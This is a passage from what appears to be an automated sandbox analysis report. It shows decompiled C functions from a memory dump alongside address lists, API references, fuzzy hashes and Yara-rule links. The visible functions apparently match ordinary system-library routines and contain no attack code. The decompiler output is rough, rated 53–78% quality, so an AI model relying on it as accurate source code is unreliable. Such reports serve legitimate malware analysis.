								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E1E427016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1e498708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1e497b00; // 0x0
							asm("ror esi, cl");
							 *0x1e49b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E1E3E95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E1E3B7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x1e3d03f1
0x1e3d03f7
0x1e3d03f9
0x1e3d03fb
0x1e3d03fd
0x1e3d0400
0x1e3d040a
0x1e414c7a
0x1e3d0537
0x1e3d0547
0x1e3d0410
0x1e3d0410
0x1e3d0414
0x1e3d0417
0x1e3d041a
0x1e3d0421
0x1e3d0424
0x1e3d042b
0x1e3d043b
0x1e3d043e
0x1e3d043f
0x1e3d043f
0x1e3d0446
0x1e3d0449
0x1e3d044c
0x1e3d044f
0x1e3d0459
0x1e414c8d
0x1e3d045f
0x1e3d045f
0x1e3d045f
0x1e3d0467
0x1e414c97
0x1e414c9d
0x1e414ca4
0x1e414caa
0x1e414caf
0x1e414cb1
0x1e414cc3
0x1e414cb3
0x1e414cbc
0x1e414cbc
0x1e414cc8
0x1e414ccb
0x1e414cd7
0x1e414cda
0x1e414cdf
0x1e414cdf
0x1e414ccb
0x1e414ca4
0x1e3d046d
0x1e3d046f
0x1e3d046f
0x1e3d0471
0x1e3d0476
0x1e3d047a
0x1e3d047b
0x1e3d0483
0x1e3d0489
0x1e3d048d
0x00000000
0x00000000
0x1e414ce9
0x1e414cef
0x1e414d22
0x1e414d22
0x00000000
0x1e414d22
0x1e414cf1
0x1e414cf7
0x00000000
0x00000000
0x1e414cf9
0x1e414cff
0x00000000
0x00000000
0x1e414d05
0x1e414d07
0x00000000
0x00000000
0x1e414d0d
0x1e414d0f
0x1e414d14
0x1e414d16
0x00000000
0x00000000
0x1e414d1c
0x1e414d1c
0x1e3d0499
0x1e3d0535
0x1e3d0535
0x00000000
0x1e3d0535
0x1e3d04a6
0x1e414d2c
0x1e414d37
0x1e414d39
0x1e414d3b
0x00000000
0x00000000
0x1e414d41
0x1e414d48
0x1e3d0527
0x1e3d052b
0x1e3d052d
0x1e3d0530
0x1e3d0530
0x00000000
0x1e3d052b
0x1e414d4e
0x1e3d04ac
0x1e3d04ac
0x1e3d04af
0x1e3d04b2
0x1e3d04b7
0x1e3d04b9
0x1e3d04bb
0x1e3d04bd
0x1e3d04bf
0x1e3d04c5
0x1e3d04c9
0x1e414d53
0x1e414d59
0x1e414db9
0x1e414dba
0x1e414dbf
0x1e414dc2
0x1e414dc4
0x1e414dc7
0x1e414dce
0x00000000
0x1e414dce
0x1e414d5b
0x1e414d61
0x00000000
0x00000000
0x1e414d63
0x1e414d69
0x00000000
0x00000000
0x1e414d6b
0x1e414d6e
0x1e414d74
0x1e414d76
0x1e414d7c
0x1e414d7e
0x1e414d84
0x1e414d89
0x1e414d8c
0x1e414d8d
0x1e414d92
0x1e414d95
0x1e414d96
0x1e414d98
0x1e414d9a
0x1e414d9f
0x1e414da4
0x1e414da6
0x1e414da8
0x1e414daf
0x1e414db1
0x1e414db1
0x1e414daf
0x1e414da6
0x1e414d84
0x1e414d7c
0x00000000
0x1e414d74
0x1e3d04d6
0x1e414de1
0x1e3d04dc
0x1e3d04dc
0x1e3d04dc
0x1e3d04e4
0x1e414deb
0x1e414df1
0x1e414df8
0x1e414dfe
0x1e414e03
0x1e414e05
0x1e414e17
0x1e414e07
0x1e414e10
0x1e414e10
0x1e414e1c
0x1e414e1f
0x1e414e35
0x1e414e35
0x1e414e1f
0x1e414df8
0x1e3d04f1
0x1e3d04fa
0x1e414e3f
0x1e414e47
0x1e414e5b
0x1e414e61
0x1e414e67
0x1e414e69
0x1e414e71
0x1e414e73
0x1e3d0500
0x1e3d0500
0x1e3d0500
0x1e3d04fa
0x1e3d0508
0x1e3d051d
0x1e3d051d
0x1e3d051f
0x1e3d0524
0x00000000
0x1e3d0524
0x1e3d0515
0x1e3d0517
0x1e414e7a
0x1e414e7c
0x00000000
0x00000000
0x1e414e85
0x00000000
0x1e414e85
0x00000000
0x1e3d0517

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fbe4d2728364583600a20246dd087b88b3b91afcf38f3190a13a71d466323e0
Instruction ID: 13fbb03a1ad3522161ec2847e460eddd4d81e1dfb375d976ac812c599f6a7ea7
Opcode Fuzzy Hash: 3fbe4d2728364583600a20246dd087b88b3b91afcf38f3190a13a71d466323e0
Instruction Fuzzy Hash: 0C912672E043959BEF228B68C854B9DB7B6BF05B64F410366E911AB2D0D774ED04CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E1E3AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x1e47f7a8);
				E1E3FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E1E3FD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E1E3ED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E1E3EF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E1E3FDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E1E3EB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E1E3EB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E1E3EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E1E3EA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x1e3ab171
0x1e3ab171
0x1e3ab171
0x1e3ab171
0x1e3ab171
0x1e3ab176
0x1e3ab17b
0x1e3ab180
0x1e3ab186
0x1e3ab18f
0x1e3ab198
0x1e3ab1a4
0x1e3ab1aa
0x1e404802
0x1e404802
0x1e404805
0x1e40480c
0x1e40480e
0x1e3ab1d1
0x1e3ab1d3
0x1e3ab1de
0x1e3ab1de
0x1e404817
0x1e40481e
0x1e404820
0x1e404822
0x1e404822
0x1e404824
0x1e404824
0x1e40482a
0x00000000
0x00000000
0x1e404835
0x1e40483a
0x1e40483d
0x1e40483f
0x1e404842
0x1e404842
0x1e404842
0x1e404846
0x1e40484c
0x1e40484e
0x1e404851
0x1e404851
0x1e404853
0x1e404854
0x1e404854
0x1e404858
0x1e40485a
0x1e40485a
0x1e40485d
0x1e40485f
0x1e404861
0x1e404861
0x1e404866
0x1e40486b
0x1e40486e
0x1e404871
0x1e404876
0x1e404876
0x1e404878
0x1e40487b
0x1e404884
0x1e404884
0x00000000
0x1e40487d
0x1e40487d
0x1e404882
0x1e404889
0x1e404889
0x1e40488f
0x1e404891
0x1e4048e0
0x1e4048e2
0x1e4048e4
0x1e4048e4
0x1e4048e7
0x1e4048e7
0x1e4048ed
0x1e4048f4
0x1e4048f6
0x1e404951
0x1e404951
0x1e404953
0x1e404953
0x1e404956
0x1e404956
0x1e404958
0x1e404959
0x1e404959
0x1e40495d
0x1e40495d
0x1e40495f
0x1e40495f
0x1e404965
0x1e404969
0x1e4049ba
0x1e4049ba
0x1e4049c1
0x1e4049c5
0x1e4049cc
0x1e4049d4
0x1e4049d7
0x1e4049da
0x1e4049e4
0x1e4049e5
0x1e4049f3
0x1e404a02
0x00000000
0x1e404a02
0x1e404972
0x1e404974
0x00000000
0x00000000
0x1e404976
0x1e404979
0x1e404982
0x1e404983
0x1e404984
0x1e40498b
0x1e40498d
0x1e404991
0x1e404993
0x1e404999
0x1e40499d
0x1e4049a2
0x1e4049a2
0x1e4049a2
0x1e404999
0x1e4049ac
0x00000000
0x1e4049b3
0x1e4048f8
0x1e4048fe
0x00000000
0x00000000
0x00000000
0x1e4048fe
0x1e404895
0x1e40489c
0x1e4048ad
0x1e4048b2
0x1e4048b5
0x1e4048b7
0x1e4048ba
0x1e4048bc
0x1e4048c6
0x1e4048c6
0x1e4048cb
0x1e4048d1
0x1e4048d4
0x1e4048d8
0x1e4048d8
0x00000000
0x1e4048d8
0x1e4048be
0x1e4048c0
0x00000000
0x00000000
0x1e4048c2
0x00000000
0x00000000
0x00000000
0x1e4048c4
0x00000000
0x1e404882
0x1e40487b
0x1e404904
0x1e404906
0x00000000
0x00000000
0x1e404908
0x1e40490e
0x00000000
0x00000000
0x1e404910
0x1e404917
0x1e404917
0x00000000
0x1e404917
0x1e3ab1ba
0x1e4047f9
0x1e4047fc
0x00000000
0x00000000
0x00000000
0x1e4047fc
0x1e3ab1c0
0x1e3ab1c0
0x1e3ab1c3
0x1e3ab1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 1E4048AD

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 6c99d6266ccdf48fb05fadb532050ba07696c80b0a9b873e777ed9f0d93e7c5b
Instruction ID: c37024432e2de6a6d1e45e3ed870e2f162669c62b8bf614a1159d01f8caf0b49
Opcode Fuzzy Hash: 6c99d6266ccdf48fb05fadb532050ba07696c80b0a9b873e777ed9f0d93e7c5b
Instruction Fuzzy Hash: 8B51D17AD102AA8EDB21CF748844BEEBBB1BF00310F1047BED859AB385D7744981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1E3CB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e49d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E1E3C7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E1E478CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E1E3E9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E1E3EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E1E3ECE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E1E3C7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E1E478F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E1E3EAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1e498628; // 0x0
								_v68 = _t77;
								_t78 =  *0x1e49862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1e498628; // 0x0
							_t116 =  *0x1e49862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x1e3cb94c
0x1e3cb956
0x1e3cb95c
0x1e3cb95e
0x1e3cb964
0x1e3cb969
0x1e3cb96d
0x1e3cb96d
0x1e3cb970
0x1e3cb974
0x1e3cb97a
0x1e3cbadf
0x1e3cbadf
0x1e3cbae2
0x1e3cbae4
0x1e3cbae6
0x1e3cbaf0
0x1e412cb8
0x1e3cbaf6
0x1e3cbaf6
0x1e3cbaf6
0x1e3cbafd
0x1e3cbb1f
0x1e3cbb1f
0x1e3cbaff
0x1e3cbb00
0x1e3cbb00
0x1e3cbb03
0x1e3cbb03
0x1e3cbacb
0x1e3cbacf
0x1e3cbad0
0x1e3cbad1
0x1e3cbadc
0x1e3cbadc
0x1e3cb980
0x1e3cb980
0x1e3cb988
0x1e3cb98b
0x1e3cb98d
0x1e3cb990
0x1e3cb993
0x1e3cb999
0x1e3cb99b
0x1e3cb9a1
0x1e3cb9a5
0x1e3cb9aa
0x1e3cb9b0
0x1e3cb9bb
0x1e3cb9c0
0x1e3cb9c3
0x1e3cb9ca
0x1e3cb9cc
0x1e3cb9cf
0x1e3cb9d3
0x1e3cb9d7
0x1e3cba94
0x1e3cba94
0x1e3cba98
0x1e3cbaa3
0x1e412ccb
0x1e3cbaa9
0x1e3cbaa9
0x1e3cbaa9
0x1e3cbab1
0x1e412cd5
0x1e412cdd
0x1e412cdd
0x1e3cbabb
0x1e3cbabc
0x1e3cbac2
0x1e3cbac3
0x1e3cbac3
0x1e3cbac6
0x00000000
0x1e3cb9dd
0x1e3cb9dd
0x1e3cb9e7
0x1e3cb9e7
0x1e3cb9ec
0x1e3cb9ec
0x1e3cb9f1
0x1e3cb9f5
0x1e3cb9fa
0x1e3cba00
0x1e3cba0c
0x1e3cba10
0x1e3cba10
0x1e3cba12
0x1e3cba18
0x00000000
0x00000000
0x1e3cbb26
0x1e3cbb26
0x1e3cba1e
0x1e3cba1e
0x1e3cba23
0x1e3cba25
0x1e3cba2c
0x1e3cba30
0x1e3cba35
0x1e3cba35
0x1e3cba41
0x1e3cba46
0x1e3cba4c
0x1e3cba50
0x1e3cba54
0x1e3cba6a
0x1e3cba6e
0x1e3cba70
0x1e3cba74
0x1e3cba78
0x1e3cba7a
0x1e3cba7c
0x1e3cba8e
0x1e3cba90
0x1e3cba92
0x1e3cbb14
0x1e3cbb14
0x1e3cbb16
0x1e3cbb16
0x00000000
0x1e3cba7c
0x1e3cbb0a
0x1e3cbb0d
0x00000000
0x00000000
0x00000000
0x1e3cbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E3CB9A5

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 0e5fcbbe6d7b455731a49b65aa44b11481b4850dec76a5986f7e07201b5d0020
Instruction ID: 944d909e96baa3697a4ce212018ea06203c0423bcc30ba6129d09fff5ce8300b
Opcode Fuzzy Hash: 0e5fcbbe6d7b455731a49b65aa44b11481b4850dec76a5986f7e07201b5d0020
Instruction Fuzzy Hash: E7514775A18391CFC718CF29C48491ABBEABB88700F148E6EE9C697354D731EC44DB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E3E4A2C, Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1E3E4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x1e49d360 ^ _t62;
				_v8 =  *0x1e49d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E1E3C2280(_t26, 0x1e498608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E1E3BFFB0(_t41, _t51, 0x1e498608);
						L2:
						 *0x1e49b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E1E3EB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E1E3C2280(_t28, 0x1e498608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E1E3BFFB0(_t42, _t53, 0x1e498608);
							if(_t53 != 0) {
								L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E1E3BFFB0(_t41, _t51, 0x1e498608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x1e3e4a2c
0x1e3e4a34
0x1e3e4a3c
0x1e3e4a3e
0x1e3e4a48
0x1e3e4a4b
0x1e3e4a4d
0x1e3e4a51
0x1e3e4a9c
0x00000000
0x00000000
0x1e3e4aa3
0x1e3e4aa8
0x1e3e4aad
0x1e3e4ab1
0x1e3e4ade
0x1e3e4ae3
0x1e3e4a5a
0x1e3e4a62
0x1e3e4a6a
0x1e3e4a6e
0x1e41f203
0x1e3e4a84
0x1e3e4a88
0x1e3e4a89
0x1e3e4a8a
0x1e3e4a95
0x1e3e4a95
0x1e3e4a79
0x1e3e4a80
0x1e3e4af2
0x1e3e4af4
0x1e3e4af9
0x1e3e4aff
0x1e3e4b01
0x1e3e4b03
0x1e3e4b08
0x1e41f20a
0x1e41f212
0x1e41f216
0x1e41f216
0x1e3e4b08
0x1e3e4b13
0x1e3e4b1a
0x1e41f229
0x1e41f229
0x1e3e4b1a
0x1e3e4a82
0x00000000
0x1e3e4a82
0x1e3e4ab7
0x1e3e4acd
0x1e3e4acd
0x1e3e4ad5
0x1e3e4ada
0x00000000
0x1e3e4ada
0x1e3e4ac2
0x1e3e4acb
0x00000000
0x00000000
0x00000000
0x1e3e4acb
0x1e3e4a53
0x1e3e4a53
0x1e3e4a58
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1E3E4A62

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: cb3c0998067a8171fa4a95dfb4275ae49d3b2ff1432ef3440f7baf9ab68170e4
Instruction ID: 6b6e4aea34d91f9aa57a683a36a0beadeb3900cd942116d71c417c8de5f7574e
Opcode Fuzzy Hash: cb3c0998067a8171fa4a95dfb4275ae49d3b2ff1432ef3440f7baf9ab68170e4
Instruction Fuzzy Hash: 1E31D3362056B1DBC7119F59CD84B5ABBA6FFCC720F01471AE8556BA40CB70EC40CB85

Uniqueness

Uniqueness Score: -1.00%

Function 1E3C0050, Relevance: 1.6, APIs: 1, Instructions: 81
timeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E1E3C0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
